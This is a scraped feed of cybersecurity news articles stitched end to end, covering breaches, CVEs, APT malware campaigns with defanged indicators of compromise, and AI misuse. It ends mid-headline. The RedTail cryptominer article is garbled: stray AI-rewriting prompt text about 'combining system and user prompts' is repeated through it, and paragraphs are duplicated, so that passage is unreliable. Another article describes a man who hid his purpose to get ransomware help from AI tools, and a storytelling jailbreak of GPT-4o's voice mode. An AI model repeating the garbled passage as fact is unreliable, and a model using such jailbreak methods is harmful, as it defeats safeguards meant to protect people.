Reading view
NIST Hires External Contractor to Help Tackle National Vulnerability Database Backlog
Clearing the National Vulnerability Database Backlog
NIST is responsible for managing entries in the NVD. After being overwhelmed with the volume of entries amid a growing backlog of CVEs that have accumulated since February, the institute has awarded an external party with a contract to aid in its processing efforts. "We are confident that this additional support will allow us to return to the processing rates we maintained prior to February 2024 within the next few months," the agency stated. To further alleviate the backlog, the NIST is also working closely with CISA, the Cybersecurity and Infrastructure Security Agency, to improve its overall operations and processes. "We anticipate that this backlog will be cleared by the end of the fiscal year," the NIST stated. In its status update, NIST referenced an earlier statement the agency made that it was exploring various means to address the increasing volume of vulnerabilities through the use of modernized technology and improvements to its processes. [caption id="attachment_73938" align="alignnone" width="2332"] Source: NIST NVD Status Updates[/caption] "Our goal is to build a program that is sustainable for the long term and to support the automation of vulnerability management, security measurement and compliance," the institute said. NIST reaffirmed its commitment to maintaining and modernizing the NVD, stating, "NIST is fully committed to preserving and updating this vital national resource, which is crucial for building trust in information technology and fostering innovation."CISA's 'Vulnrichment' Initiative
In response to the growing NVD backlog at NIST, CISA had launched its own initiative called "Vulnrichment" to help enrich the public CVE records. CISA's Vulnrichment project is designed to complement the work of the originating CNA (Common Vulnerabilities and Exposures Numbering Authority) and reduce the burden on NIST's analysts. CISA said it would use an SSVC decision tree model to categorize vulnerabilities. The agency will consider factors like exploitation status, technical impact, impact on mission-essential functions, public well-being, and whether the exploitation is automatable. CISA welcomes feedback from the IT cybersecurity community on this effort. By providing enriched CVE data, CISA aims to improve the overall quality and usefulness of the NVD for cybersecurity professionals. "For those CVEs that do not already have these fields populated by the originating CNA, CISA will populate the associated ADP container with those values when there is enough supporting evidence to do so," the agency explained. As NIST and CISA work to address the current challenges, they have pledged to keep the community informed of their progress as well as on future modernization plans. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.Hacker Links Ticketmaster and Santander Data Leaks to Snowflake Breach
"To date, we do not believe this activity is caused by any vulnerability, misconfiguration, or malicious activity within the Snowflake product," the cloud storage giant said in a statement today.Snowflake's AI Data Cloud platform serves more than 9,000 customers, including major companies such as Adobe, AT&T, Capital One, DoorDash, HP, JetBlue, Mastercard, Micron, NBC Universal, Nielsen, Novartis, Okta, PepsiCo, Siemens, US Foods, Western Union, and Yamaha, among others.
Alleged Snowflake Breach Details
According to cybersecurity firm Hudson Rock, the threat actor claims to have accessed data from additional high-profile companies using Snowflake's services, including Anheuser-Busch, State Farm, Mitsubishi, Progressive, Neiman Marcus, Allstate, and Advance Auto Parts. The method described involved bypassing Okta's authentication by using stolen credentials to log into a Snowflake employee's ServiceNow account. From there, they allegedly generated session tokens to extract data from Snowflake customers. Hudson Rock reported that the threat actor claimed the breach affected up to 400 companies, showing evidence of access to over 2,000 customer instances related to Snowflake's Europe servers.Extortion Attempt and Malware Involvement
The threat actor claimed to have attempted to extort Snowflake for $20 million to buy back the stolen data, but Snowflake did not respond. Hudson Rock noted that a Snowflake employee was infected with a Lumma-type Infostealer in October, which stole their corporate credentials. The malware infection was supported by screenshots shared by the threat actor.Snowflake Responds
Snowflake has confirmed breaches of customer accounts but denied that any vulnerability or misconfiguration in its products was exploited. The cloud storage company stated that they observed unauthorized access to certain customer accounts , which they said is likely unrelated to any flaws in Snowflake's infrastructure."We believe this is the result of ongoing industry-wide, identity-based attacks with the intent to obtain customer data. Research indicates that these types of attacks are performed with our customers’ user credentials that were exposed through unrelated cyber threat activity.Snowflake has notified the "limited" number of customers about these attacks and urged them to enhance their account security by enabling multi-factor authentication (MFA).
Tools and Indicators of Compromise
The company published a security bulletin containing Indicators of Compromise (IoCs), investigative queries, and guidance for securing affected accounts. One IoC indicates that the threat actors used a custom tool named "RapeFlake" to exfiltrate data from Snowflake's databases. Another showed the use of "DBeaver Ultimate" data management tools, with logs indicating connections from the "DBeaver_DBeaverUltimate" user agent. Snowflake also shared query to identify access from suspected clients and how to disable a suspected user. But this might not be enough. A very important step here is: "If you have enabled the ALLOW_ID_TOKEN parameter on your account, the user must be left in the disabled state for 6 hours to fully invalidate any possible unauthorized access via this ID token feature. If the user is re-enabled before this time the attacker may be able to generate a new session using an existing ID token, even after the password has been reset or MFA has been enabled." While a threat actor claims to have breached Snowflake and accessed data from numerous high-profile companies, Snowflake maintains that these breaches resulted from compromised customer accounts rather than any inherent vulnerabilities in their systems. Snowflake continues to investigate the incidents and has taken steps to improve customer account security.Multiple Vulnerabilities Reported in LenelS2 NetBox Entry Tracking and Event Monitoring Tool
Multiple Vulnerabilities in Carrier's LenelS2 NetBox
Three vulnerabilities were identified in Carrier's product security advisory for NetBox. The most critical (CVE-2024-2420) of these vulnerabilities could potentially enable an attacker to circumvent authentication requirements and obtain elevated permissions, presenting a serious risk to enterprises which deploy the tool. [caption id="attachment_73894" align="alignnone" width="1478"] Source: Carrier Product Security Advisory[/caption] Successful compromise could allow an attacker to install programs, view, edit, modify data, delete data from the platform or create new user accounts with full privileges. However, this depends on the access level of accounts that had been compromised in the event of an attack. The impact of a potential attack could be lower on systems configured with low level of user access. The vulnerabilities affect all LenelS2 NetBox versions prior to 5.6.2. The identified vulnerabilities are as follows:- CVE-2024-2420 (CVSS v3.1 Base Score 9.8, Critical): A vulnerability involving a hard-coded password in the system that could permit an attacker to bypass authentication requirements.
- CVE-2024-2421 (CVSS v3.1 Base Score 9.1, Critical): An unauthenticated remote code execution vulnerability that could permit an attacker with elevated permissions to run malicious commands
- CVE-2024-2422 (CVSS v3.1 Base Score 8.8, High): An authenticated remote code execution vulnerability that could permit an attacker to execute malicious commands.
Vulnerability Remediation
Carrier has attempted to address these vulnerabilities in its latest release of NetBox version 5.6.2. Carrier has advised customers to immediately upgrade to the latest release version by reaching out to their authorized NetBox installer. As mitigation, Carrier also advised customers to follow the recommended deployment guidelines, which are detailed in its NetBox hardening guide accessible through NetBox's built-in help menu. The Center of Internet Security has advised customers to take additional measures such as applying appropriate updates to NetBox systems, applying the principle of least privilege to user accounts, rigorous scanning of vulnerabilities and isolating critical systems, functions, or resources. The lack of basic security safeguards along with poor code practices such as the presence of hard-coded authentication tokens and improper input sanitization raises concerns about the usage of NetBox to guard physical access to important business and government areas or critical infrastructure. While there are no confirmed reports of the NetBox vulnerabilities being exploited in the wild, the severity of these vulnerabilities mark them as an important security consideration as countless organizations could be at risk of devastating attacks. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.Copilot+ Recall is ‘Dumbest Cybersecurity Move in a Decade’: Researcher
Copilot Recall Privacy and Security Claims Challenged
In a long Mastodon thread on the new feature, Windows security researcher Kevin Beaumont wrote, “I’m not being hyperbolic when I say this is the dumbest cybersecurity move in a decade. Good luck to my parents safely using their PC.” In a blog post on Recall security and privacy, Microsoft said that processing and storage are done only on the local device and encrypted, but even Microsoft’s own explanations raise concerns: “Note that Recall does not perform content moderation. It will not hide information such as passwords or financial account numbers. That data may be in snapshots that are stored on your device, especially when sites do not follow standard internet protocols like cloaking password entry.” Security and privacy advocates take issue with assertions that the data is stored securely on the local device. If someone has a user’s password or if a court orders that data be turned over for legal or law enforcement purposes, the amount of data exposed could be much greater with Recall than would otherwise be exposed. Domestic abuse situations could be worsened. And hackers, malware and infostealers will have access to vastly more data than they would without Recall. Beaumont said the screenshots are stored in a SQLite database, “and you can access it as the user including programmatically. It 100% does not need physical access and can be stolen.” He posted a video (republished below) he said was of two Microsoft engineers gaining access to the Recall database folder with apparent ease, “with SQLite database right there.” [videopress izzNn3K5]Does Recall Have Cloud Hooks?
Beaumont also questioned Microsoft’s assertion that all this is done locally. “So the code underpinning Copilot+ Recall includes a whole bunch of Azure AI backend code, which has ended up in the Windows OS,” he wrote on Mastodon. “It also has a ton of API hooks for user activity monitoring. “It opens a lot of attack surface. ... They really went all in with this and it will have profound negative implications for the safety of people who use Microsoft Windows.”Data May Not Be Completely Deleted
And sensitive data deleted by users will still be saved in Recall screenshots. “There's no feature to delete screenshots of things you delete while using your PC,” Beaumont said. “You would have to remember to go and purge screenshots that Recall makes every few seconds. If you or a friend use disappearing messages in WhatsApp, Signal etc, it is recorded regardless.” One commenter said Copilot Recall seems to raise compliance issues too, in part by creating additional unnecessary data that could survive deletion requests. “[T]his comprehensively fails PCI and GDPR immediately and the SOC2 controls list ain't looking so good either,” the commenter said. Leslie Carhart, Director of Incident Response at Dragos, replied that “the outrage and disbelief are warranted.” A second commenter noted, “GDPR has a very simple concept: Data Minimization. Quite simply, only store data that you actually have a legitimate, legal purpose for; and only for as long as necessary. Right there, this fails in spectacular fashion on both counts. It's going to store vast amounts of data for no specific purpose, potentially for far longer than any reasonable use of that data.” It remains to be seen if Microsoft will make any modifications to Recall to quell concerns before it officially ships. If not, security and privacy experts may find themselves busier than ever.Andariel APT Using DoraRAT and Nestdoor Malware to Spy on South Korean Businesses
Malware Used by Andariel APT in this Campaign
The first of the two malware strains used in the latest campaign was Nestdoor, a remote access trojan (RAT) that has been active since May 2022. This RAT can execute commands from the threat actor to control infected systems. Nestdoor has been found in numerous Andariel attacks, including those exploiting the VMware Horizon product’s Log4Shell vulnerability (CVE-2021-44228). The malware is developed in C++ and features capabilities such as file upload/download, reverse shell, command execution, keylogging, clipboard logging, and proxy functionalities. A specific case in 2022 involved Nestdoor being distributed alongside TigerRAT using the same command and control (C&C) server. Another incident in early 2024 saw Nestdoor disguised as an OpenVPN installer. This version maintained persistence via the Task Scheduler and communicated with a C&C server. The Andariel APT has been developing new malware strains in the Go language for each campaign. Dora RAT, a recent discovery is one such malware strain. The backdoor malware supports reverse shell and file transfer operations and exists in two forms: a standalone executable and an injected process within "explorer.exe." The latter variant uses an executable in WinRAR SFX format, which includes an injector malware. The Dora RAT has been signed with a valid certificate from a UK software developer in an attempt to make it look legitimate.Additional Malware Strains
- Keylogger/Cliplogger: Performs basic functions like logging keystrokes and clipboard contents, stored in the “%TEMP%” directory.
- Stealer: It is designed to exfiltrate files from the system, potentially handling large quantities of data.
- Proxy: Includes both custom-created proxy tools and open-source Socks5 proxy tools. Some proxies are similar to those used by the Lazarus group in past attacks.
IoCs to Watch for Signs of Andariel APT Attacks
IoCs to monitor for attacks from Andariel APT group include: MD5s – 7416ea48102e2715c87edd49ddbd1526: Nestdoor – Recent attack case (nest.exe) – a2aefb7ab6c644aa8eeb482e27b2dbc4: Nestdoor – TigerRAT attack case (psfile.exe) – e7fd7f48fbf5635a04e302af50dfb651: Nestdoor – OpenVPN attack case (openvpnsvc.exe) – 33b2b5b7c830c34c688cf6ced287e5be: Nestdoor launcher (FirewallAPI.dll) – 4bc571925a80d4ae4aab1e8900bf753c: Dora RAT dropper (spsvc.exe) – 951e9fcd048b919516693b25c13a9ef2: Dora RAT dropper (emaupdate.exe) – fee610058c417b6c4b3054935b7e2730: Dora RAT injector (version.dll) – afc5a07d6e438880cea63920277ed270: Dora RAT injector (version.dll) – d92a317ef4d60dc491082a2fe6eb7a70: Dora RAT (emaupdate.exe) – 5df3c3e1f423f1cce5bf75f067d1d05c: Dora RAT (msload.exe) – 094f9a757c6dbd6030bc6dae3f8feab3: Dora RAT (emagent.exe) – 468c369893d6fc6614d24ea89e149e80: Keylogger/Cliplogger (conhosts.exe) – 5e00df548f2dcf7a808f1337f443f3d9: Stealer (msload.exe) C&Cs – 45.58.159[.]237:443: Nestdoor – Recent attack case – 4.246.149[.]227:1443: Nestdoor – TigerRAT attack case – 209.127.19[.]223:443: Nestdoor – OpenVPN attack case – kmobile.bestunif[.]com:443 – Dora RAT – 206.72.205[.]117:443 – Dora RATPirated Copies of Microsoft Office Used to Distribute Frequent Malware in South Korea
Malicious Pirated Copies of Microsoft Office and Other Programs
Researchers from AhnLab discovered that attackers have been creating and distributing malicious copies of popular utility software. These copies were distributed through common file-sharing platforms and torrent websites. The operation takes advantage of users looking to obtain free copies of software without paying the required license fee. When downloaded and executed, the programs usually appear as convincing cracked installers or activators for programs such as Microsoft Office or the Hangul word processor. While the initial downloader was developed in .NET, the attackers appear to have moved to more obfuscated attack techniques. The malware retrieves its instructions for the next stage of its attack from Telegram or Mastodon channels operated by the attackers. These channels contain encrypted Base64 strings that lead to Google Drive or GitHub URLs that host the malicious payloads. These malicious payloads are downloaded and decrypted through the use of the legitimate 7-zip archive utility that is commonly present on systems and operates with low footprint. Researchers discovered that the decrypted payloads contained PowerShell instructions to load and execute additional malware components on the victim's system. The malware strains loaded on the infected systems include:- OrcusRAT: A remote access trojan with extensive capabilities like keylogging, webcam access, and remote screen control.
- XMRig Cryptominer: Configured to stop mining when resource-intensive apps are running to avoid detection. Also kills competing miners and security products.
- 3Proxy: Injects itself into legitimate processes to open a backdoor proxy server.
- PureCrypter: Fetches and runs additional malicious payloads from attacker-controlled servers.
- AntiAV: Disrupts security products by repeatedly modifying their configuration files.
Continuous Reinfection and Distribution
The researchers said systems may remain infected even after the initial infection has been removed, due to the malware's ability to update itself as well as download additional malware payloads. They stated that the attackers had distributed new malware on affected systems multiple times each week to bypass file detection. The researchers said the number of systems that had been compromised in these attacks continued to increase as the registered task scheduler entries loaded additional malicious components on affected systems despite the removal of previous underlying malware. The researchers advised South Korean users to download software and programs from their official sources rather than file-sharing sites. Users who suspect that their systems may already have been infected should remove associated task scheduler entries to block the download of additional malware components, and update their antivirus software to the latest available versions. The researchers have additionally shared indicators of compromise, categories that have been detected as flagged in the attack, MD5 hashes of files used in the attack, associated C&C server addresses, and suspicious behaviors that have been observed during the attack. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.Hawk Eye App Data Breach in India: Personal Data of Thousands Exposed in Telangana State
Login Data Exposes Hawk Eye App Data Breach
The Hawk Eye App was launched by the Telangana Police in December 2014 for both Android and iPhone users as part of its initiative to become a citizen-friendly and responsive police force. Denizens were encouraged to use the app to report on a wide range of activities, including traffic violations, passing on information about criminals, violations by police, and crime against women, and also to pass on suggestions to the lawmen for improved policing and to credit the good work done by them. A key feature of the app is the SOS button for accessing help in case of emergencies. While logging into the App, users are required to share their personal details, including name, email ID, mobile number and password for registration. The app currently has a 4.4 rating on the Google Play Store, with more than 500,000 downloads on Android alone. [caption id="attachment_73712" align="alignnone" width="720"] Source: Hawk Eye App on Android[/caption]Hawk Eye App Data Breach Samples
A few of the samples exposed by the threat actor revealed that one woman had filed a complaint on the Hawk Eye App to share that a man had initially promised to marry her and is now facing threats from him and his family. Alarmingly, the data leak revealed her name, mobile number, location, date, and time of complaint, potentially putting her at risk. In several other cases, citizens had filed complaints of traffic violations, and their data used initially to login to the App, including name, email address, and phone numbers, were revealed in the data breach. What is noteworthy about the above examples is that all these users had filed complaints only in May 2024, which suggests that the data from the Hawk Eye App was hacked this month.Cops Wary of Hawk Eye App Data Breach
When The Cyber Express downloaded the “Hawk Eye -Telangana Police” app on Android on May 31, the app remained non-functional after the tester entered the primary details. Surprisingly, the app did not appear when the user tried to download it from the Apple Store. Sources in the Telangana Police have confirmed to The Cyber Express that there was a failure to upgrade the app and the process for updating a patch is an ongoing exercise. Police sources in the Telangana IT wing shared that they were working with vendors to install an updated patch. This, the police officials shared, could be a reason for the app details being breached. Additional Director General of Police (Technical Services) VV Srinivasa Rao of the Telangana Police shared that the task of upgrading Hawk Eye has been given to developers and that it should be available for the latest Android versions shortly. DGP Shikha Goel, who is also the director of the Telangana State Cyber Security Bureau, was unavailable for comment. We update this story as we get more information. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.RedTail Cryptominer Evolves with Palo Alto PAN-OS CVE-2024-3400 Vulnerability
RedTail Cryptominer Leverages Private Cryptomining Pools
According to Akamai, the folks behind the RedTail cryptominer have chosen to use "private cryptomining pools" to have more control over their mining activities, even though it comes with higher operational and financial costs. The tactics used in this campaign closely resemble those used by the Lazarus group, as per the research. One noteworthy aspect of this variant is its use of private cryptomining pools. By using these private pools, the attackers can have better control and security over their operations, just like other popular threat groups. This shift towards private pools suggests a more coordinated and intentional strategy in cryptomining activities, which raises the possibility of involvement by nation-state actors. The goal of combining system and user prompts is to help the assistant refine the text and make it sound more like it was written by a human, while still maintaining the original content's purpose and accuracy.RedTail Cryptominer: Sneaky and Stealthy
The RedTail cryptominer is no amateur when it comes to flying under the radar and maintaining its grip on compromised systems. It employs clever tactics like anti-research measures and blends the XMRig cryptomining code with extra layers of encryption and logic. This sneaky combination of system and user prompts is designed to enhance the assistant's skills in transforming the text into a more natural and relatable version, all while staying true to the original content's purpose and accuracy. So, let's dive in and uncover the secrets of the RedTail cryptominer! This malware really knows its stuff when it comes to cryptomining. It optimizes its operations to be as efficient and profitable as possible. By using a combination of system and user prompts, the goal is to help the assistant transform the text into something that sounds more human-like while staying true to the original content's purpose and accuracy. In addition to exploiting the PAN-OS CVE-2024-3400 vulnerability, the actors behind RedTail are targeting a variety of other vulnerabilities across different devices and platforms. This encompasses exploits aimed at SSL-VPNs, IoT devices, web applications, and security devices like Ivanti Connect Secure.How to Use the Akamai App & API Protector?
Akamai suggests Akamai App&API Protector for additional security features and identifies all Palo Alto devices and patches them to prevent the RedTail cryptominer. The users can also harden their devices for cyberattacks such as web platform attacks, command injections, and local file inclusion. In addition, instead of merely relying on PAN-OS CVE-2024-3400 vulnerability, the developers of RedTail take advantage of several other vulnerabilities in different platforms and devices. These involve breaches to SSL VPNs, IoT products, web apps, as well as security appliances such as Ivanti Connect Secure.Alert: Kimsuky Hacking Group Targets Human Rights Activists
As per recent reports a new social engineering attack attributed to the North Korea-linked Kimsuky hacking group is targeting human rights activists using fake Facebook accounts. This tactic, involving fictitious identities, marks a significant shift from their typical email-based spear-phishing strategies. According to a report by South Korean cybersecurity firm Genians, the attackers pose as […]
The post Alert: Kimsuky Hacking Group Targets Human Rights Activists appeared first on TuxCare.
The post Alert: Kimsuky Hacking Group Targets Human Rights Activists appeared first on Security Boulevard.
UnitedHealth’s Leadership Criticized by Senator Wyden for Appointment of Underqualified CISO
Broader Context of Cyberattack on Change Healthcare
At the heart of the criticism is the appointment of a Chief Information Security Officer (CISO) who had no prior full-time experience in cybersecurity before assuming the role in June 2023. This, according to Wyden, epitomizes the corporate negligence that has placed countless stakeholders at risk. Wyden argues that Martin's appointment exemplifies a broader pattern of poor decision-making by UHG’s senior executives and board of directors, who should be held accountable for the company’s cybersecurity lapses. The comparison to SolarWinds is particularly telling. The SolarWinds incident exposed vulnerabilities in software supply chains, leading to widespread consequences across multiple sectors. Similarly, UHG's data breach, if proven to result from preventable lapses, highlights the critical need for stringent cybersecurity practices in healthcare, an industry that handles sensitive personal and medical data.The Incident and Initial Reactions
The incident in question involved hackers exploiting a remote access server at Change Healthcare, which lacked multi-factor authentication (MFA). This basic cybersecurity lapse allowed the attackers to gain an initial foothold, leading to a ransomware infection that crippled UHG’s operations. During testimony before the Senate Finance Committee on May 1, 2024, UHG CEO Andrew Witty admitted that the company’s MFA policy was not uniformly implemented across all external servers. Witty's revelations highlighted a broader issue of inadequate cybersecurity defenses at UHG, despite the industry's reliance on MFA as a fundamental safeguard.Industry Standards and Regulatory Expectations
Wyden’s letter points out that the Federal Trade Commission (FTC) has mandated MFA for financial services companies under the Safeguards Rule and has enforced its use in cases against companies like Drizly and Chegg. These precedents establish MFA as a non-negotiable standard for protecting consumer data. UHG's failure to implement this basic security measure on all its servers is a glaring oversight, suggesting a disconnect between its stated policies and actual practices. Moreover, Wyden highlights the necessity of multiple lines of defense in cybersecurity. The fact that hackers could escalate their access from one compromised server to the entire network indicates a lack of network segmentation and other best practices designed to contain breaches. This deficiency exacerbates the initial failure to secure remote access points.Consequences and Broader Implications
The implications of UHG’s cybersecurity failures are profound. The immediate aftermath saw significant disruptions, with some of UHG's systems taking weeks to restore. Witty admitted that while cloud-based systems were quickly recovered, many critical services running on UHG's own servers were not engineered for rapid restoration. This lack of resilience in UHG’s infrastructure planning highlights a failure to anticipate and mitigate the risk of ransomware attacks, a known and escalating threat. Wyden’s letter also addresses the financial fallout. UHG has already estimated the breach's cost at over a billion dollars, reflecting the significant economic impact of the cyberattack. This financial burden, coupled with negative media coverage, exposes UHG to substantial political and market risks. The case echoes the SEC’s stance in the SolarWinds case, where cybersecurity practices were deemed crucial for investor decisions. Investors in UHG would similarly consider enhanced cybersecurity practices essential, given the potential for massive breaches to affect stock value and company reputation.Accountability and Regulatory Action
Senator Wyden calls for the FTC and SEC to investigate UHG’s cybersecurity and technology practices, aiming to determine if any federal laws were violated and to hold senior officials accountable. This push for accountability highlights the role of corporate governance in cybersecurity. The Audit and Finance Committee of UHG’s board, responsible for overseeing cybersecurity risks, is criticized for its apparent failure to fulfill its duties. Wyden suggests that the board's lack of cybersecurity expertise likely contributed to the oversight failures, a critical point in an era where cybersecurity threats are increasingly sophisticated and pervasive.OpenAI Exposes AI-Powered State Actors in Global Influence Operations
Threat Actors Employ AI and Covert Influence Operations
These threat actors, hailing from diverse geopolitical regions, including Russia, China, Iran, and a commercial entity based in Israel, have exploited the technology of artificial intelligence, especially generative AI, to create a series of covert influence operations. These operations, meticulously documented and analyzed within the report, exemplify the sophisticated strategies employed by malicious actors to exploit AI technologies for their nefarious agendas, says OpenAI. One of the prominent operations highlighted in the report is "Bad Grammar," a previously undisclosed campaign originating from Russia. Operating primarily on the messaging platform Telegram, Bad Grammar sought to disseminate politically charged content targeting audiences in Ukraine, Moldova, the Baltic States, and the United States. Despite its geographic reach, this operation was characterized by its blatant grammatical errors, reflecting a deliberate attempt to undermine credibility while leveraging AI models for content generation. Similarly, the report sheds light on the activities of "Doppelganger," a persistent threat actor linked to Russia, engaged in disseminating anti-Ukraine propaganda across various online channels. Employing a hybrid approach that combines AI-generated content with traditional formats such as memes sourced from the internet, Doppelganger exemplifies the fusion of old and new tactics in these campaigns.Influencing Geographical Politics
The report also highlights covert influence campaigns linked to China, Iran, and a commercial group in Israel, in addition to those connected with Russia. These operations, known by names like "Spamouflage" and "STOIC," use various strategies to push their specific agendas. Their activities include promoting pro-China narratives while attacking its detractors, as well as creating content focused on the Gaza conflict and the elections in India. Despite the diverse origins and tactics employed by these threat actors, the report highlights common trends that shed light on the current state of covert influence. One such trend is the pervasive use of AI models to augment productivity and streamline content generation processes. From generating multilingual articles to automating the creation of website tags, AI serves as a force multiplier for malicious entities seeking to manipulate digital discourse. Furthermore, the report goes deeper into the intricate interplay between AI-driven strategies and human error, emphasizing the inherent fallibility of human operators engaged in covert influence operations. Instances of AI-generated content containing threatening signs of automation by state-hackers.Researchers Uncover New Data Theft Campaign of Advanced Threat Actor ‘LilacSquid’
Use of Open-Source Tools and Customized Malware
The campaign from LilacSquid employs MeshAgent, an open-source remote management tool and a customized version of QuasarRAT that researchers refer as "PurpleInk," as primary implants after compromising vulnerable application servers exposed to the internet. LilacSquid exploits public-facing application server vulnerabilities and compromised remote desktop protocol (RDP) credentials to deploy a range of open-source tools and customized malware, including MeshAgent, SSF, PurpleInk, and loaders InkBox and InkLoader.LilacSquid's Long-Term Access for Data Theft through Persistence
Talos assessed with high confidence that LilacSquid has been active since at least 2021, focusing on establishing long-term access to compromised organizations to siphon valuable data to attacker-controlled servers. The campaign has successfully compromised entities in Asia, Europe, and the United States across various sectors such as pharmaceuticals, oil and gas, and technology. LilacSquid uses two primary infection chains: exploiting vulnerable web applications and using compromised RDP credentials. [caption id="attachment_73284" align="aligncenter" width="1024"] LilacSquid Initial Access and Activity. (Credit: Cisco Talos)[/caption] Once a system is compromised through exploiting vulnerabilities on internet facing devices, LilacSquid deploys multiple access tools, including MeshAgent, SSF, InkLoader, and PurpleInk. [caption id="attachment_73286" align="aligncenter" width="1024"] LilacSquid's Lateral Movement via RDP. (Credit: Cisco Talos)[/caption] MeshAgent, downloaded using bitsadmin utility, connects to its command and control (C2) server, conducts reconnaissance, and activates other implants. On the other hand InkLoader, a .NET-based malware loader, is used when RDP credentials are compromised. It persists across reboots and executes PurpleInk, with the infection chain tailored for remote desktop sessions.PurpleInk Implant of LilacSquid
PurpleInk, derived from QuasarRAT, has been customized extensively since 2021."Although QuasarRAT has been available to threat actors since at least 2014, we observed PurpleInk being actively developed starting in 2021 and continuing to evolve its functionalities separate from its parent malware family."It features robust remote access capabilities, including process enumeration, file manipulation, system information gathering, remote shell access, and proxy server communication. Different variants of PurpleInk exhibit varying functionalities, with some stripped-down versions retaining core capabilities to evade detection. InkBox, an older loader used by LilacSquid, reads from a hardcoded file path on disk, decrypts its contents, and runs PurpleInk. Since 2023, LilacSquid has modularized the infection chain, with PurpleInk running as a separate process via InkLoader. [caption id="attachment_73282" align="aligncenter" width="1024"] PurpleInk Activation Chain (Credit: Cisco Talos)[/caption] Post-exploitation, MeshAgent activates other tools like SSF and PurpleInk. MeshAgent, configured with MSH files, allows operators to control infected devices extensively, managing files, viewing and controlling desktops, and gathering device information.
Parallels with North Korean APT Groups
The tactics, techniques, and procedures (TTPs) used in this campaign show similarities to those of North Korean APT groups, such as Andariel and Lazarus. Andariel is known for using MeshAgent to maintain post-compromise access, while Lazarus extensively employs SOCKs proxy and tunneling tools, along with custom malware, to create channels for secondary access and data exfiltration. LilacSquid has similarly deployed SSF and other malware to establish tunnels to their remote servers. The LilacSquid campaign highlights the persistent and evolving threat posed by sophisticated APT actors. By leveraging a combination of open-source tools and customized malware, LilacSquid successfully infiltrates and maintains long-term access to diverse organizations worldwide. IoCs to detect LilacSquid's PurpleInk infection:PurpleInk: 2eb9c6722139e821c2fe8314b356880be70f3d19d8d2ba530adc9f466ffc67d8
Network IOCs
67[.]213[.]221[.]6 192[.]145[.]127[.]190 45[.]9[.]251[.]14 199[.]229[.]250[.]142Japanese Man Arrested for GenAI Ransomware as AI Jailbreak Concerns Grow
AI Jailbreak Tools and Methods Unclear
News reports on Hayashi’s arrest have been lacking in details on the tools and methods he used to create the ransomware. The Japan Times reported that Hayashi, a former factory worker, “is not an expert on malware. He allegedly learned online how to ask AI tools questions that would elicit information on how to create malware.” Hayashi came under suspicion after police arrested him in March “for allegedly using fake identification to obtain a SIM card registered under someone else's name,” the paper reported. The Japan News, which reported that Hayashi is unemployed, said police found “a homemade virus on a computer” following the March arrest. The News said police suspect he “used his home computer and smartphone to combine information about creating malware programs obtained after giving instructions to several generative AI systems in March last year.” Hayashi “allegedly gave instructions to the AI systems while concealing his purpose of creating the virus to obtain design information necessary for encrypting files and demanding ransom,” the News reported. “He is said to have searched online for ways to illegally obtain information.” Hayashi reportedly admitted to charges during questioning, and told police, “I wanted to make money through ransomware. I thought I could do anything if I asked AI.” There have been no reports of damage from the ransomware he created, the News said.LLM Jailbreak Research Heats Up
The news comes as research on AI jailbreaking and attack techniques has grown, with a number of recent reports on risks and possible solutions. In a paper posted to arXiv this week, the CISPA researchers said they were able to more than double their attack success rate (ASR) on GPT-4o’s voice mode with an attack they dubbed VOICEJAILBREAK, “a novel voice jailbreak attack that humanizes GPT-4o and attempts to persuade it through fictional storytelling (setting, character, and plot).” Another arXiv paper, posted in February by researchers at the University of California at Berkeley, looked at a range of risks associated with GenAI tools such as Microsoft Copilot and ChatGPT, along with possible solutions, such as development of an “AI firewall” to monitor and change LLM inputs and outputs if necessary. And earlier this month, OT and IoT security company SCADAfence outlined a wide range of AI tools, threat actors and attack techniques. In addition to general use case chatbots like ChatGPT and Google Gemini, the report looked at “dark LLMs” created for malicious purposes, such as WormGPT, FraudGPT, DarkBERT and DarkBART. SCADAfence recommended that OT and SCADA organizations follow best practices such as limiting network exposure for control systems, patching, access control and up to date offline backups. GenAI uses and misuses is also expected to be the topic of a number of presentations at Gartner’s Security and Risk Management Summit next week in National Harbor, Maryland, just outside the U.S. capital.Toshiba America Data Breach: Customers and State Authorities Notified
Toshiba America Data Breach
After conducting a preliminary investigation, Toshiba reported that an attacker may have compromised its email environment. The attacker may have obtained unauthorized access to sensitive personally identifiable information such as names and Social Security numbers from the email compromise. The investigation confirmed that the breach could have impacted numerous individuals, leading Toshiba to contact affected individuals, as legally required. Toshiba America Business Solutions advised customers to remain cautious over the incident. The firm advised customers to regularly review their credit reports, financial account statements, and payment card statements for any unauthorized activity. Any suspicious activity could be reported to Toshiba or law enforcement agencies. Toshiba apologized to the affected individuals for any inconvenience stemming from the incident and said that additional measures had been implemented since then to enhance the security of its email environment and prevent similar occurrences in the future. To assist the affected individuals in safeguarding their personal information, Toshiba has arranged for a complimentary, two-year membership of identity monitoring services offered through Kroll. This membership offering includes triple bureau credit monitoring, fraud consultation, and identity theft restoration. The fraud consultation option allows affected individuals to reach out to Kroll fraud specialists for advice and assistance relating to identity protection, legal rights, and detection of suspicious activity. The identity theft restoration option lets affected individuals work with a licensed Kroll investigator to resolve potential identity theft issues. Toshiba stated that these services would be provided for free to the affected individuals and would not negatively impact their credit scores. Affected individuals were encouraged to use the services as well as to contact Toshiba or Kroll for additional assistance.Law Firm Announces Investigation
Strauss Borrelli PLLC, a data breach law firm, announced on its website that it would be investigating Toshiba American Business Solutions, Inc. with regard to the recent data breach that exposed sensitive personally identifiable information. While the full extent of the data breach is unknown, the Toshiba America Business Solutions division operates offices across the U.S. and Latin America. The law firm encouraged customers who received a breach notification letter from Toshiba American Business Solutions to contact Strauss Borrelli PLLC to discuss their rights and potential legal remedies in response to the incident. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.Malicious Firmware Update Destroyed Over 600,000 Routers Across ISP
'Pumpkin Eclipse' Router Attack
